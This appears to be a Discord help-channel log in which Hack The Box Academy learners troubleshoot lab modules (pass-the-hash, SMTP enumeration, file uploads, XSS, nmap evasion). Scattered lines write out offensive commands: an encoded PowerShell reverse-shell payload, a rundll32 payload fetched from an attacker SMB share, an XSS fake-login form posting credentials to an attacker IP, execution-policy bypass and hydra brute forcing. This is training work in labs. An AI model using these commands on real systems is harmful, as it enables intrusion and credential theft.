#modules
it says it's not a directory?
you typed it wrong then
what else do you see
Parrot Security 6.1 \n \1
you can select the whole text, then right click > copy, then at the bottom of the screen there is a small clipboard which will open a popup and you can copy the value outside of the browser
thanks yoray, that genuinely helped
in this case you should drop the \n, which means new line, and the \1, which I have no idea what it means, an escaped character 1
okay nice
which is good
I have a question
Which VM do you guys advise for new people?
I've heard of Ubuntu and Kali Linux
I've used Ubuntu more though, but which is best, or is it mainly the same?
kali and parrot have most of the tools needed already installed
I use Kali because I don't like the Parrot look, ngl
kk thx man fr
same, it's kinda cringe
I suffer through it for the Academy Pwnbox just because it's turnkey
xfce
xfce all the way
but i prefer my wm to look as close to win95 or w7 "classic mode" as possible
on Password Attacks > Pass the Hash (PtH)
- 0 Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.
Invoke-SMBExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash i have it -Command "powershell -e JABj....."
[+] Command executed with service XMNCTGHBAHUVISEDCUVT on DC01
it shows the command executed but I don't get a reverse shell
maybe try another protocol 😉
seem with invoke-smbexec
what?
i dont know why
you're not making any sense
I can't use a photo here
so what am I supposed to do?
Anyone for the Intro to Whitebox Hacking skills assessment question 2? Can't seem to get rid of "code injection should not be possible", even without sanitization or validation.
i pretty much told you exactly what to do
Does it need to be a real EA user?
What does your error say?
so far I have had several while trying different flags and adding -dc-ip, this is just the latest one. I tried the FQDN as well
Hello! I am currently on Windows Server section on Windows Priv Esc module and I am literally following steps from the page and running smb_delivery in metasploit and then running rundll32.exe on target machine and keep on getting ‘wrong path’ or some error like that. Any insights on what I am doing wrong here?
I would first start with reviewing all the commands needed for this attack. If you're certain the others fired off correctly then I'd add -target-ip to see if that helps.
You want to delete your two images and dm me the commands you ran?
need to see the command
I use smb_delivery
Set SRVPort 1234
Run
Then get the command
Rundll32.exe \\10.10.14.51\lEzmq\test.dll,0
Then copy/paste that command on the Windows target machine and it's not working
why is the SRVPORT on 1234
If I leave it on 445 the exploit won't work
why
EAccess permission denied
You can DM
is there something else running on port 445?
It shouldn't, as I am using Pwnbox and not my own VM
type jobs
No active jobs
send screenshot in dm
I have a question, I'm not too sure if I can ask here, but when I start a module do I have infinite time to complete it?
you can start/stop it whenever you like and how many times you like
gotcha
thank you for the answer 🙂
and my next question, this is gonna sound dumb probs, but if I have a laptop with Kali on it does that work for HTB? or do I need to use Parrot or your guys' provided workstations. just curious as I prefer Kali
but I know Parrot has some stuff Kali doesn't, and obviously vice versa
you are free to use whatever operating system you feel comfortable with
gotcha, it doesn't ask for specific Parrot stuff, I see
I have been using Kali the entire time and have not had any issues
I do have a full ParrotOS Security VM as well, I try it out from time to time..
hello, I can't get the database in MSSQL from the Footprinting module. Does someone know the right way to do this?
SQL (ILF-SQL-01\backdoor dbo@master)>
Hello! I want to enter the world of cybersecurity. Can you guys guide me for my first steps? I was thinking about what module/course/path to take as a very beginner in this domain. If you could shortly mention a certain roadmap I would be grateful! Thank you!
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Thank you !!
Why is it a problem using smbclient with Parrot?
You need to be more specific friendo.
Got something with _NET_LINK, closed the VM and I ain't home so can't check it again.. Could be because of using VM / Bridge / SSH > OpenVPN?
hello
how can I resolve htb-student@nixfund:~$ systemctl show dconf.service -p Type
Type=
Hey guys for the Attacking LSASS section in password attacks the files do not show up after rundll32 command
Guys, I have a problem with large pings to the labs from Pwnbox and from my host with different VPN configurations. Am I the only one with this problem?
Hey, in the Windows Privilege Escalation module, Interacting with Users, I created an SCF file named @Inventory.scf with my HTB Pwnbox tun0 IP put inside, started Responder in my Pwnbox and executed that SCF, but it doesn't return any hash in Responder
I have a question
How to log in to bandit
Using an SSH server
Like I am facing an issue
Like permission denied
If you need/want help, please tell us the module and section you are experiencing issues with.
I think Maruf is referring to the 'over the wire' bandit exercises for linux command line familiarization.
it is not HTB related
possibly just the wrong server in his Discord
Any help
looks like you need to sudo, it's trying to access ports 80 and 445, someone mentioned this to you yesterday, the first 1000 or so ports are sudo protected
Hi, how to fix this problem in Metasploit? The host (10.129.140.80:445) was unreachable.
have you connected via the vpn / provided the correct port?
and lhost?
lhost = tun0?
failing that, double check your attacker box hasn't expired
yes
107 min left
ping it, that ticker is sometimes wrong... I checked mine yesterday, it said it had 90 something minutes left and it was down to only 3 minutes. You might've just started the target box, but as a sanity check, best to rule it out
ping and what ip?
can we see full terminal output please including cmd?
let it run for about 10 seconds
hello, is there another way to finish the web archives modules in Information Gathering - Web Edition ? it needs the wayback machine but the website is down for me
nope its instrumental to the modules
looks like its down for me too, archive.org
so i just need to wait for it to be up again ?
pretty much T_T''
if you're working the fundamentals path just move on for a while
ok thanks for the confirmation ahah
Hi, is there some easy method to transfer assignment files to Pwnbox? Because when I log into my Academy account in the browser of the Pwnbox, the display iteratively shrinks itself and I can't even download the file, as the location of the button changes place constantly
using xfreerdp? add /drive:/path/to/share,myShare01
the option args are /drive:<path-to-share>,<shareName> (as you want it to appear in the target)
I dont understand. What share? Why xfreerdp?
I have file at the end of the module to download
Oh, you mentioned the display shrinking, I thought you were talking about xfreerdp
so you can use wget sometimes
I was able to use wget on this latest module I was doing, but that was with a module-provided script; most of the time I'm just SCP'ing the files to the box, which is another option
Hello folks, I'm practicing my bypass firewalls and IDS/IPs skills with nmap. Can you please suggest any good labs on HTB focusing on this area or any VM or online labs.
Can you check messages with me?
but I guess i would have to be authenticated to use wget. You were providing cookies in the options?
yes thx for the heads up, didn't hear a ding
No, I'm not sure why the one I did worked, trying to figure that out, but I did run into the unauth issue you described on all others, just scp them
in the case of scp I would have to open some ports on the firewall?
on the pwnbox?
scp should run over 22 same as ssh?
Anyone please....
if u can ssh you should be able to scp
you re right. I mentioned opening ports as i assumed the ssh port would be closed by default
No biggie, in real world you certainly would
so i will try what you suggest
right on, you got it?
yes it works, thanks! The credentials stored in the Desktop works for ssh
Look under "Academy x HTB labs" to get box recommendations for each module
Hey, I'm on the footprinting module, SMTP chapter. The second question "Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer."
I finally found the username after manually testing every name in the given wordlist, But I guess that wasn't the intended way.
I tried smtp-user-enum -M VRFY -U homeworklist.txt -t 10.129.23.36 -v
but this gave no results, I don't understand what was the intended way to solve this
you mean if there is an automated way of testing the word list?
yes
I don’t think there’s much you can practice there, I kind of doubt the bypass part would work in real life like that (you don’t trick a firewall by sending more packets) and I don’t think any box incorporates that topic. Nmap you use on all boxes, but the bypass part is eh
I think msfconsole has a module for that but I haven't tried it out.
So that was just it hey? I guess I did okay then
Thanks for answering !
Can someone help with an rdp sanity check on: https://academy.hackthebox.com/module/226/section/2415
the section states that the connection attempt may need to be retried multiple times to get a successful connection... I've made two attempts at connecting several hours apart, and now with two RDP services, xfreerdp and Remmina, neither is working
👀
Yeah I did it manually aswell when I went through the module. I am sure there are ways to automate it
Same error from each rdp client, as well.
└──╼ [★]$ xfreerdp /v:10.129.144.102 /u:htb-student /p:HTB_@cademy_stdnt! /dynamic-resolution
[08:03:42:508] [87682:87709] [ERROR][com.winpr.timezone] - Unable to find a match for unix timezone: US/Central
[08:03:42:809] [87682:87709] [WARN][com.freerdp.core.rdp] - pduType PDU_TYPE_DATA not properly parsed, 164 bytes remaining unhandled. Skipping.
[08:03:42:809] [87682:87709] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[08:03:42:809] [87682:87709] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGR24
[08:03:42:827] [87682:87709] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[08:03:42:827] [87682:87709] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[08:03:42:827] [87682:87709] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel disp
[08:03:42:828] [87682:87709] [ERROR][com.freerdp.core.update] - [0x03] Cache Glyph - SERVER BUG: The support for this feature was not announced! Use /relax-order-checks to ignore
[08:03:42:828] [87682:87709] [ERROR][com.freerdp.core.update] - order flags 03 failed
[08:03:42:828] [87682:87709] [ERROR][com.freerdp.core.update] - update_recv_order() failed
[08:03:42:828] [87682:87709] [ERROR][com.freerdp.core.update] - UPDATE_TYPE Orders [0] failed
[08:03:42:828] [87682:87709] [ERROR][com.freerdp.core.rdp] - DATA_PDU_TYPE_UPDATE - update_recv() failed
[08:03:42:828] [87682:87709] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
[08:03:42:828] [87682:87709] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]
[08:03:42:828] [87682:87709] [INFO][com.freerdp.client.common] - Network disconnect!
what does this do /relax-order-checks
no luck with /relax... I did encapsulate the password in quotes, no dice with either. I think the module is bugged... hopefully someone can try it and confirm it's broke and I'll submit a ticket
This is the next one after that, I finished that yesterday
Yes but any time you access restricted ports you MUST sudo
This is from Interacting with Users
today, yesterday, tomorrow, it will be the same
I did sudo responder command
something is still not right, regarding your ports, it may not have anything to do with responder
also please copy paste the terminal output, are you using discord on your phone and not on the computer?
your cmds and their output ultimately are going to help far more resolve your problem
I'm working on the Local File Inclusion module: https://academy.hackthebox.com/module/23/section/251.
Can anyone tell me why it’s not returning any values? It doesn't allow me to include files that are locally present on the server. For example, with /etc/passwd, it returns an empty history field.
you working the exercises? if so which one and whats your payload? feel free to DM if you feel like it
ding me here after so I know it came through, Discord isn't making an audible alert to DMs for me
👌
Hi. Is it normal that a lot of practical exercises are asking things that I'm not supposed to know yet? For example, I just learned how to create files and directories and move and copy them, but the practical exercise is asking me to identify last modified file and find inode number. I can easily find how to do this on the internet but it's just weird. Is this made to encourage to do some research yourself or am i missing out on something?
yes this happens sometimes, did the section go over ls yet? sometimes it expects you to learn a simple cmd then how to use its granular options ls -lah (on your own)
Hello everyone, I need help with the Windows Attack & Defense module, I'm at the GPP Password section but I'm stuck as "running scripts is disabled on this system"
Do I need to regenerate the instance?
You should Google what that means
Yes the previous one was about ls. Ok.
if this is a powershell issue there's a trick i found (instead of having to set-ExecutionPolicy and then unset it later, you can spawn a powershell instance in bypass mode via powershell.exe -ep bypass
this is super thanks
well I didn't "find" it, someone here had a one-liner that included it and I "found" it helpful
you know what im sayin tho
so is it generally ok using google to solve modules ? trying to avoid answer spoiler
hrm, not really, but if you find yourself stuck on a syntax/priv/operational issue like that, it's ok to search around and see if it's something not related to the module, then get past it
you should utilize what's in the module info primarily, then failing that, Google
that said, there are several skill assessments and other things where you'll find they want something far and beyond what's been mentioned in the module, so after exhausting your known info then head to Google
Still kinda new and this was my first wall I couldnt figure out alone lol
oh ok, good to know
Hello! I am doing the Footprinting course from HTB Academy, module 112, section 1069, and I have no idea how to find the FQDN of the host where the last octet ends with x.x.x.203, can someone please help me? Thank you!
have you tried nslookup?
or dig?
usually you share what you've tried in your response
in your question*
anyhow, this usually doesn't work on boxes or modules because there's no DNS; what you might consider is checking the http title via nmap -vv
The question you initially asked is out of scope for the module and something you should already know. You should get comfortable using a search engine closing any gaps the module does not cover. Though if you're having difficulty with what the module is trying to explain there might be a knowledge gap that is covered in a prior module. The module information page should say if there are any prerequisites.
usually the hostname is returned with nmap scan plus the usual fixings -sC -A etc or -vv
Ok, thanks
FQDN is going to be hostname + domain, in case you aren't aware. If this is a Windows box it'll likely be the AD DS domain, or just a generic TLD for a Linux box
i think that section uses a linux box with a generic TLD like .htb
YMMV
Review the section again, it explains how to do it.
What is the best way to review previously completed modules? I'm going through each one, but the exercises are kind of repetitive, and going through every module takes a while. Open to any suggestions.
Hi, I'm stuck at Infiltrating Windows in the Shells & Payload Module. I'm at the last question where you need to get a shell on the system. However I'm unable to get a meterpreter shell using the eternalblue payload. I also tried to change the payload. Can anyone give me a hint?
I did that
Nothing works
Make sure you're setting your lhost
Thanks for your answer, I already did that. I get the following error message after running the payload: Rex::HostUnreachable: The host (x.x.x.x:445) was unreachable
Something does work, but it's not copy paste from the page, you have to use your noodle a little bit.
Dm which msf exploit you're trying
did you set your payload?
set payload windows/x64/meterpreter/reverse_https
and set your lhost to 0.0.0.0
I managed to get it to work
mind dm'ing me what you did? i'd like to know a "better" way to do it as well.
It had nothing to do with what u said
I had to dig AXFR zones, and figured out a zone allows digging and the other doesn't, and then I went through a lot of word lists for the zone that doesn't allow zone transfer
And found it
oh I see, yeah AXFR, beware that rarely if ever works in the real world, unless you're dealing with a very poorly configured/misconfigured DNS server; the last well known incident of this was: https://www.sciencealert.com/north-korea-just-accidentally-revealed-it-only-has-28-websites
Next time if you provide details like that when asking a question it makes it easier to provide a better nudge.
Thanks @shut quest
Oh, okey
2016 xd
I am doing the Footprinting module, SMTP section, done everything, searched everything but can't find the answer, any help will be appreciated
also used the wordlist that is given in the resources tab but unable to
be it metasploit or the enum script, you are specifying the way that it enumerate for users, u can change it
lets try that
Too add to that you might be enumerating too fast, it can skip over important things.
so how much timeout should I set? 5 seconds is the default
try more, maybe 7 or 10?
tried 10 now with VRFY, it didn't work, now trying other
20 is a safe bet
com onnn felassss
You can try less than that if you want
And I said 20 is a safe bet
maybe module is broken
Wait till you get to password brute forcing
I'm looking at the module right now, for right now, you might want to look back at the SMB modules, maybe there's a way to enum domain users?
In the shells and payloads skills assessments, I have all the questions that scans will give me answers for. Are we supposed to just use the standard metasploit modules to do the further questions or are we supposed to do it manually?
That's what this section is about but over smtp
If you're comfortable doing the exploits manually you can or you can use something like metasploit.
Can I speak to someone from HTB for MSSQL, Exchange, and SCCM Attacks?
I was able to complete the Skills Assessment in a non-intended way. So I just wanted to confirm with you.
Please DM me.
Module: File upload attack
Section: Type filter
Can anyone give me some insights on the upload?
I fuzzed the extension via burp and got positive for ||reverse double like phar.jpg||, still I can't exec any of those
I did modify the content type, set the ||GIF8|| string, and tried both _REQUEST and file_get_contents
and yes I did disable URL encoding for all attempts
have u tried to swap the extensions?
Need some help, I am trying to edit the svg file I made for Limited File Uploads. Which programs allow me to edit them?
using Parrot OS
u can use a normal text editor
Tried using Vim and Pluma, but I'll try it again
SVG is just a text file
just echo the whole thing and pipe and you good to go
I'm doing File Uploads - Skill Assessment and after enumerating the contact page, I can't seem to find any upload functionality. All I got is following form.
<div class="form-box">
<h1>Contact Us</h1>
<p>You may send us your feedback or any inquiries you have.</p>
<form action="/contact/submit.php" method="get">
<div class="form-group">
<label for="name">Name</label>
<input class="form-control" id="name" type="text" name="Name" required>
</div>
<div class="form-group">
<label for="email">Email</label>
<input class="form-control" id="email" type="email" name="Email" required>
</div>
<div class="form-group">
<label for="message">Message</label>
<textarea class="form-control" id="message" name="Message" required></textarea>
</div>
<div>
<p>Attach a screenshot</p>
<div class="form-group">
<div class="input-group">
<div class="custom-file">
<input name="uploadFile" id="uploadFile" type="file" class="custom-file-input" id="inputGroupFile02" onchange="checkFile(this)" accept=".jpg,.jpeg,.png">
<label id="inputGroupFile01" class="custom-file-label" for="inputGroupFile02" aria-describeby="inputGroupFileAddon02">Select Image</label>
</div>
<button id="upload"><i class="fa fa-upload"></i></button>
</div>
</div>
<p id="upload_message"></p>
</div>
<input class="btn btn-primary" type="submit" value="Submit">
</form>
</div>
</main>
Is this intentional or there's a need for dir brute forcing?
um.
Read again?
Look for unsigned events - $_.Message -notlike 'Signed: true'
CTRL+F
There's a GET /contact/submit.php but it ain't uploading the file as I see it
Ah i see, maybe you need to look for a different place for upload then
hey guys, little question, I'm doing the Password Cracking easy lab, I tried brute forcing the FTP and SSH protocols with hydra to find the root password and also tried different password files but can't find the answer, any help or hint?
You won't directly get the root's password. Try brute forcing another user first.
okej gonna see to enumerate something
is the user that I have to find in the other section or do I have to find him by enumeration?
You have the wordlists provided in the module.
oh yeah i'm stupid -_- but quick question is there a tool where you can enumerate users from just an ip or not?
i guess no but we never know ^^
You can but in this case you have to brute force.
okej thank you
Is it the right command to go bcs i received nothing?
hey guys, I am having a connectivity issue trying to ping my target machine but ain't getting connected
I am doing the Information Gathering module
DNS zone transfer section
I edited my /etc/hosts file but still can't ping
make sure ur vpn server is correct
iirc you don't need the mutated lists for this one just use the plain user/password list you got from the resources. Also try other protocols.
Hello
I am using the US academy server which shows low load
doing those 2 after the nmap scan, they're the only ports I saw open
That's weird. You're doing password attacks lab easy right?
wait you already are scanning ftp so wait a while or increase the threads to make it go faster. I used -t 48
yes
19 minutes to go we will see
Any help with this invoke clipboard logger its not running as its shown in the module
Did you import first
CPTS XSS Module -> phishing
https://academy.hackthebox.com/module/103/section/984
How can I add this code document.write('<h3>Please login to continue</h3><form action=http://10.10.15.100><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();
To this XSS payload?
'><Html%0dONPoINtERENtEr+=+(confirm)()//
Import-Module .\Invoke-Clipboard.ps1
I tried this
Before running it
Need to have the payload in a JavaScript file on your local computer for this section to work, as I learned the hard way yesterday
Also, no need to fuzz it — rather simple payload.
found the creds but idk can't find the flag?
i used several methodes to find some config files and all that stuff but nothing? any hint?
Hi guys, I just started in soc analyst path. Right now, I am doing the detection of an umanaged powershell attack question in event logs and finding evil module
My powershell shows Try the new cross-platform PowerShell https://aka.ms/pscore6
This is the command I run:
powershell -ep bypass
Import-Module C:\Tools\PSInject\Invoke-PSInject.ps1
Invoke-PSInject -ProcId 2360 -PoshCode "V3JpdGUtSG9zdCAiSGVsbG8sIEd1cnU5OSEi"
It doesn't change anything in the PID of spoolsv.exe
it doesnt become a managed state
it won't initially. you have to refresh process hacker
DM me which stage you're at now and I'll try to point you in right direction
I will dm you in 30m thanks for you help ^^
bro you just saved me from depression! I refreshed, but it still didn't work. I quit the app and restarted it. It worked!!!
Thanks!
Why are you using a username list? Aren't you given one? Or are you on the section with multiple services to check
nope i tried first with -l root but got nothing on both ports 21 and 22, i tried with list and got some creds but after login im stuck ^^
Ahhh didn't realize what section you were on
Try with user as the username
Always start simple then build complex
Just to be sure what module and section are you on?
passwordcracking module section lab easy
-l user you mean?
Password Attacks?
yup but its not the case
but like i said i used hydra with a username list
and found some creds
i took the ssh key to connect and got connected but i can't find anything on this user (i think)
The basic password list and username list from resources should be fine
Take a lesson in history
uhhh
i took a look at it but didn't pay attention at everything -__
thank you
;)
i knew it was that simple ^^
Get in those habits of quick checklists
yeah i was thinking at it a few minutes ago to try to make an automatization checkup but i need to write it down
No need to automate
no not like a script i mean like basic checks like history, depending on the open ports etc
How did you manage?
Anybody been through the SELinux optional assignment in the Linux Fundamental course?
Stuck on this module for 1 day
Information Gathering - Web Edition
Skill Assessment
i have tried ffuf, gobuster(vhost + dir) but still no result.
get these errors.
I have also added the host to the /etc/hosts file.
I haven't seen that error personally, is your hosts file correct (still correct?)
what does the command look like
yes
here it is @safe star
try lowering the threads
yeah, I have also tried this, the effect of that is just that I didn't get any client.timeout exceeded error
oh duh you're getting replies, except every few thousand or so you get an error, my mistake
maybe its just taking a while to get results
🫠
sounds like it was working without 100 threads
ummh, lemme check without thread
dm me
Feel free to report this to a mod (dm me if you’d like?)
Hi gurus, may I learn what is the alternative to waybackmachine? I am stuck at the Web Archives module as the waybackmachine is down
I got an answer and we just should wait apparently 😬 feel free to come back later to the module
Thanks thanks
Yeah..
But how would I upload that file? Ofc I can host it on a webserver, but I don't think that what's the module is about :-)
@vivid pilot check the man nc.. you have an issue with your command.
idk where I should ask this but does anybody have problem with their VM slowing down the longer they use it and does anyone have a solution? It has pretty good resources dedicated to it.
Hello guys. I am having a problem with Password Attacks/Attacking LSASS. I extracted logs as instructed but pypykatz and mimikatz are all giving an error. Logon list with mimikatz and pypykatz is also giving an error. So, is there any alternative way I can do it? I have been stuck on this for 2 days now
Dm the commands
Hello guys, I am having a connectivity problem on the Information Gathering module, DNS zone transfer section. I can't even ping the target machine even though I edited the /etc/hosts file, still can't ping the machine, but I can still ping the machine in the skill assessment section but not in this section. Can anyone help me?
Read the module again. You're literally instructed to use php -S to host both the JavaScript sender and the PHP stealer.
Yes
Hi
Password Attacks > Pass the Ticket (PtT) from Linux
Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory.
I got the svc_workstations@INLANEFREIGHT.HTB ticket in klist but I can't get creds for svc_workstations, any idea?
Well to SSH we need a password. Perhaps we need to extract the hash?
maybe try reset the vpn
and that is?
Let him cook Sparkles. It's probably hacker for hire.
there are 3 diff modes for aes256 from hashcat 19700 15900 15910
hashid -m <hash>
thx all
yeah did it as well
Password Attacks > Pass the Ticket (PtT) from Linux
Q/Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \\DC01\julio.
I have imported the ccache file into the session
root@linux01:~# klist
Ticket cache: FILE:/root/krb5cc_647###########
Default principal: julio@INLANEFREIGHT.HTB
but I can't, I tried these
root@linux01:~# smbclient //DC01/julio -k -c 'get julio.txt'
gensec_spnego_client_negTokenInit_step: gse_krb5: creating NEG_TOKEN_INIT for cifs/DC01 failed (next[(null)]): NT_STATUS_INVALID_PARAMETER
session setup failed: NT_STATUS_INVALID_PARAMETER
root@linux01:~# smbclient //DC01/julio -k -c 'more julio.txt'
gensec_spnego_client_negTokenInit_step: gse_krb5: creating NEG_TOKEN_INIT for cifs/DC01 failed (next[(null)]): NT_STATUS_INVALID_PARAMETER
session setup failed: NT_STATUS_INVALID_PARAMETER
any ideas?
Hello, I'm struggling on attacking common services > Easy.
I found the username f*** with smtp-user-enum. I saw the information on the FAQ of the website (user root on mysql, user daemon on ftp...) but it didn't work. I'm wanting to bruteforce ftp with hydra with the username I found :
hydra -l f*** -P ../resources/pws.list -f ftp://ip_address -o hydra_ftp.txt
but I get the error:
[ERROR] all children were disabled due too many connection errors
Are we not supposed to brute force ftp or is it just that I'm not running the command correctly ?
why not try mysql instead
I tried bruteforcing mysql with hydra but my ip gets banned pretty quickly
I also tried logging in as root as the website's FAQ said but no luck
Anyone have an issue spawning target?
Every time it goes from “target(s) are spawning…” to “Click here to spawn the target system!”
target not spawning?
yeah me.
me too
ahh damn
we are dooomed
i really hate when im in mood to grind for hours, then stuff like this happens.
mine just spawned though, maybe give it a little more time ? Also try to reload the page
Mine also just spawned
What about bruteforcing smtp
Alright, I already tried and since it was taking forever I stopped but apparently that's the way to go, thanks !
same, but not able to interact with the target.
is target working?
Seems so
yeah it is fine now
Are you sure it transferred appropriately? I'd md5 it. sometimes things get janked up in transit.
I think you transferred the wrong executable
Try running it in CMD or run the winPEAS PowerShell script instead
Hey, in the Windows Privilege Escalation module, Pillaging section, there is a question to log in as jeff via RDP and find the password for the restic backup. I tried to use the tool Invoke-Clipboard as mentioned in this section but I can't seem to download it from the machine I've RDP'd into; also I downloaded it into my Pwnbox and transferred it to this Windows machine and used the command Invoke-ClipboardLogger, that also isn't working, any help?
Oh, you're on phishing and not session hijacking — hold on…
if the suggestions described by @dapper moth fail, you may also spawn a new instance of powershell (or cmd) from your evil-winrm session with something like powershell.exe -ep bypass and see if that works
help Password Attacks /Pass the Ticket (PtT) from Linux
whats the problem?
Why don't you read the module again?
Hi guys, I'm new here. Can I ask a question about a module in here?
yes
So I am doing the Web Requests module and the POST sub module. I'm having some issues with getting the flag for the question. This is my entry in the terminal: curl -X POST -d '{"search":"flag"}' -b 'PHPSESSID=l7s2oplu127q8fvebhr53ke7dn' -H 'Content-Type:application/json' http://83.136.254.37:40576/search.php
Which should be correct, the cookie is also a valid one that has been authenticated, but the response I get is: curl: (7) Failed to connect to 83.136.254.37 port 40576 after 2115 ms: Couldn't connect to server
I pinged the server and it seems to be fine, what am I missing? Thanks for the help
@long linden you around? I'm finding myself running into an SCP deal just as you were the other day, turns out I've been using SFTP my whole life (or maybe scp with Windows GUIs) and I'm just using it on the terminal for the first time, wanna make sure I got the syntax right...
scp <local host> <remotehost> SENDS files
scp <remotehost> <localhost> GETS files?
was this your experience?
just as a sanity check, curl the page without all that, just curl the ip+port, and can you visit it in the browser and refresh successfully?
aahhh, same issue with both the curl and just entering the ip+port in the browser
have you tried resetting the target
I just did, got the same issue with a new one
I assume this is not an issue on my end right?
are you using pwnbox?
No, VM
I am not connected to the ovpn no, should i be in this case, nooby question
Yes, you must connect to your academy ovpn connection file (box, academy, etc. are all diff connection files and should be used for their respective activities separately)
Maybe a very simple question, but why is it that in some modules I don't per se have to be connected to the ovpn and in some I do to find flags?
because in some modules they’re using a public docker ip/port
Thanks for the answer, I have no idea what that is, I will search for what it means. I will also try it while connecting to the ovpn now
Don't sweat that for now, just always connect to the VPN.
You do the fundamentals path and you'll understand what ALL that is, if you're thorough. I guarantee it
@sonic plume you working on mods this morning (UTC -6:00 here)?
huh? I am not a mod
academy mods, modules
Perfect, I am indeed doing all the fundamentals. Thanks for all the help guys, I'm gonna try it now with connecting to the ovpn
ohh, yeah almost every day, whenever I find time to do some. What about you?
correct me if I'm wrong, Web Requests was near the end of the path, don't skip around! It's in order for a reason
same, I'm force feeding myself the IDS/IPS stuff from the SOC path currently... all this rule writing and stuff from various IDPS platforms is really grinding my gears
For HTTP response splitting: I have XSS and am able to get my browser to send a request to /?admin, but when sending the payload to the admin user I get no response in the log. I checked the hint and have tried localhost with common HTTP ports but still no hits. Anyone who's already done this able to give me a nudge? Thanks
I went for a defensive module and this was one of the lowest level ones because I was a bit bored/fried with all of the fundamentals of the "Information Security Foundations". Guess it's time to go back now. I finished half of it by now.
right on, try not to skip around, force feed. join the club!
Hahaha will do!
Good morning guys, I'm Brazilian, do you have any tips with HTB academy too?
whats wrong with wayback machine?
its under attack
it looks like it was breached
or has been hacked or something
yeah T_T''
Also another thing, I am trying to get a junior position as a Cybersecurity analyst and wondered what is one of the best ways to get there? I recently finished my Google Cybersecurity Professional + Network+ cert, studying for Security+ now and after I'll go for PenTest+, OSCP/OSCE. You guys have any tips to expedite and optimize chances to get in? (I'm doing a full career switch without any career exp)
may I dm you cuz I tried from the VM and Pwnbox and none of them work
clear browser cache/cookies
ok
also are you on public wifi? I noticed when I'm at the library or coffee shop I can't get certain target boxes to spawn, prob a firewall issue
I am at home
ok thought so just figured id mention
did you logout/login?
ok just a minute
Make sure you understand how each part of your payload needs to be encoded. Also keep in mind that you can use relative URLs instead of absolute URLs to avoid potential port issues. For instance, if you want your XSS payload to hit the path /test on the same site the XSS payload runs on, it is sufficient to specify the URL as "/test" instead of "http://vulnerablesite:1337/test".
unfortunately, still not working
hello everyone, I am a beginner and trying to learn nmap. In the IDS/IPS evasion easy lab I am trying to run this scan
sudo nmap <ip address> -sS -O -D RND:3 -T2
but it isn't yielding me any desired output, i.e. OS name. Can someone please put me in the right direction? It would be really helpful, thank you
I am trying to go for a stealth SYN attack with decoy for 3 IP headers and slowing it. I also tried -f for fragmenting the packets to be even more stealthy but it ain't working for me somehow
try -A instead of -O, -A includes -O (to my understanding) but if you're not getting anything try as a sanity check.
oh and I also added -sV and I got
Nmap scan report for 10.129.8.203 (10.129.8.203)
Host is up, received reset ttl 255 (0.30s latency).
All 1000 scanned ports on 10.129.8.203 (10.129.8.203) are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: 3Com 4500G switch (92%), H3C Comware 5.20 (92%), Huawei VRP 8.100 (92%), Microsoft Windows Server 2003 SP1 (92%), Oracle Virtualbox (92%), QEMU user mode network gateway (92%), AXIS 2100 Network Camera (92%), D-Link DP-300U, DP-G310, or Hamlet HPS01UU print server (92%), HP Tru64 UNIX 5.1A (92%), Sanyo PLC-XU88 digital video projector (92%)
No exact OS matches for host (test conditions non-ideal).
try to add -Pn too, to treat host as up
ok I will try to run that too but I was avoiding it because it is still an aggressive scan and all I need is the host
yeah I was noticing your T2, I don't know how the other options come into play with that. It was also my understanding that setting the aggressiveness lower didn't nullify the other options but I could be wrong on that
the scan is legit asking me for 41 mins 💀
yeah, they can get kinda hairy no?
yea legit man imma hope this works
so imma try to run -sS -sV -T2 -Pn -A -f -D RND:3
Thanks!
In the "Attacking Jenkins" module of "Attacking Common Applications", the materials reference a vulnerability that exists in Jenkins 2.150.2 which allows users with JOB creation and Build privileges to execute code on the system via Node.js. Does this refer to this exploit: "https://www.exploit-db.com/exploits/46352"?
sudo nmap 10.129.150.189 -sS -sV -A -f -D RND:3 -T2 -reason --stats-every=10s -Pn
the above scan is not giving me anything and terminating saying
Unknown address family 0 in build_packet.
QUITTING!
sudo nmap 10.129.150.189 -sS -sV -O -f -D RND:3 -T2 -reason --stats-every=10s
while this scan is giving
Nmap scan report for 10.129.150.189 (10.129.150.189)
Host is up, received echo-reply ttl 63 (0.78s latency).
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
110/tcp open pop3 syn-ack ttl 63 Dovecot pop3d
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap syn-ack ttl 63 Dovecot imapd (Ubuntu)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
10001/tcp open scp-config? syn-ack ttl 63
